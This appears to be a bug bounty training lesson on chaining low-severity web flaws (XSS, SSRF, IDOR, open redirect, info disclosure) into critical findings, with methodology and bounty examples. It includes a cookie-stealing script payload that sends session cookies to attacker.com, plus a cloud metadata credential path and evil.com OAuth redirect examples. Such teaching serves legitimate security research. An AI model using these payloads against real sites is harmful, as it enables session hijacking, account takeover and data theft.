API & Mobile Security
Chaining Vulnerabilities for Maximum Impact
3 min read
Individual low-severity bugs can combine into critical findings. Vulnerability chaining is what separates good hunters from great ones.
Why Chain Vulnerabilities?
| Single Bug | Chained Bugs |
|---|---|
| Low-Medium severity | Critical severity |
| $100-$500 bounty | $5,000-$50,000+ bounty |
| "Informational" | "Full compromise" |
| Often dismissed | Always prioritized |
Common Chains
XSS → Account Takeover
1. Find stored XSS in user profile
2. Inject payload to steal session cookies
3. Victim views profile, session exfiltrated
4. Attacker uses stolen session
5. Full account takeover achieved
Payload:
<script>
fetch('https://attacker.com/steal?c='+document.cookie)
</script>
SSRF → Cloud Metadata → AWS Takeover
1. Find SSRF in URL fetch feature
2. Access http://169.254.169.254/latest/meta-data/
3. Extract IAM role credentials
4. Use credentials to access AWS resources
5. S3 buckets, EC2 instances compromised
Impact escalation:
- SSRF alone: Medium
- With metadata: High
- With credential access: Critical
IDOR → Mass Data Exposure
1. Find IDOR returning single record
2. Enumerate IDs to dump all records
3. Chain with SQLi or improper pagination
4. Extract entire database
5. PII of all users exposed
Open Redirect → OAuth Token Theft
1. Find open redirect: /redirect?url=evil.com
2. Use in OAuth flow: /oauth?redirect_uri=/redirect?url=evil.com
3. Victim authorizes app
4. Token sent to evil.com via redirect
5. Account access gained
Information Disclosure → Login Bypass
1. Find exposed debug endpoint with user emails
2. Password reset tokens leaked in logs
3. Correlate email → token
4. Reset any user's password
5. Admin account compromised
Complex Chain Example
Full Attack Chain: $100 Bug → $50,000 Critical
Step 1: Low-severity info disclosure
- Exposed /debug endpoint reveals internal IP
Step 2: SSRF via PDF generation
- /generate-pdf?url= accepts internal URLs
- Access internal network via disclosed IP
Step 3: Internal Jenkins found
- Jenkins at internal IP has no auth
- Can execute arbitrary commands
Step 4: Credential access
- Jenkins environment has AWS credentials
- Database connection strings exposed
Step 5: Full compromise
- AWS access → S3 buckets → customer data
- Database access → full data dump
Chaining Methodology
Step 1: Inventory All Findings
| ID | Bug | Severity | Notes |
|----|-----|----------|-------|
| 1 | Open redirect | Low | Login flow |
| 2 | SSRF (blind) | Medium | PDF generator |
| 3 | Info disclosure | Info | Version numbers |
| 4 | Weak JWT | Medium | No signature check |
Step 2: Map Potential Connections
Open redirect → OAuth flow?
SSRF → Internal services?
Info disclosure → Version → Known CVE?
Weak JWT → Token forging → Admin access?
Step 3: Test Combinations
- Can bug A enable bug B?
- Can bug B's output feed into bug C?
- What's the worst-case scenario if all succeed?
Step 4: Document the Chain
## Vulnerability Chain: Account Takeover via XSS + CSRF
### Individual Bugs
1. Stored XSS in profile bio (Medium)
2. No CSRF protection on email change (Medium)
### Attack Chain
1. Attacker injects XSS payload in their profile
2. Payload executes when victim views profile
3. XSS triggers email change to attacker's email
4. Password reset sent to attacker
5. Full account takeover
### Impact: Critical
- Any user viewing attacker's profile loses their account
Impact Multiplication Table
| Bug 1 | + Bug 2 | = Impact |
|---|---|---|
| SSRF | Internal access | Critical |
| XSS | Session theft | High→Critical |
| SQLi | Admin table access | Critical |
| IDOR | Mass enumeration | High |
| Info leak | Credential exposure | Critical |
| Open redirect | OAuth | High |
Bounty Examples
| Company | Chain | Bounty |
|---|---|---|
| Uber | SSRF → AWS → Data | $25,000 |
| Shopify | XSS → CSRF → ATO | $15,000 |
| PayPal | IDOR → Mass leak | $12,000 |
| GitLab | Info → SQLi → RCE | $35,000 |
Pro Tips
- Never discard low-severity bugs: They're chain starters
- Map application flow: Understand how data moves
- Think like an attacker: What's the worst you could do?
- Document everything: Chains need clear narratives
- Communicate impact: Help triage understand severity
Pro Tip: The best chains are told as stories. "Attacker does X, which enables Y, leading to Z compromise." Make the path to impact crystal clear.
Next module: Professional reporting and building your career. :::